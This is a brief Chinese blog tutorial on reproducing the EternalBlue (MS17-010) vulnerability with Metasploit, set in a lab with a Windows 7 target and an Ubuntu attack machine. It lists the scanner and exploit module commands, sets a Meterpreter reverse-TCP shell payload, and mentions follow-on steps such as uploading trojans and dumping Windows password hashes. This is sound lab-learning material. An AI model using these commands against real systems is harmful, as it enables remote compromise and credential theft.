利用Matesploit复现永恒之蓝漏洞

环境

目标机器:windows 7 ,172.16.136.169
攻击机:安装了Metasploit 的 ubuntu16.04 ,172.16.136.130
(安装Metasploit:在 Ubuntu 16.04 上安装、使用 Metasploit)

复现过程

使用nmap检测是否开放相关端口

image.png

使用Metasploit ms17-010模块复现

1. 查找对应模块
search ms17-01
2. 使用探测模块确认是否存在漏洞
use auxiliary/scanner/smb/smb_ms17_010
set rhost 172.16.136.169
run
3. 使用攻击模块攻击
use exploit/windows/smb/ms17_010_eternalblue
4. 使用meterpreter payload
set payload windows/x64/meterpreter/reverse_tcp
set rhost 172.16.136.169
run

这里会使用第一和第二个modules。首先使用第一个探测模块,确认目标机器存在漏洞。

image.png

然后使用第二个模块发起攻击,payload选取windows/x64/meterpreter/reverse_tcp ,得到 meterpreter shell


image.png

截图目标机器


截图

还可以执行文件操作、上传木马、提取windows hash密码等。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

友情链接更多精彩内容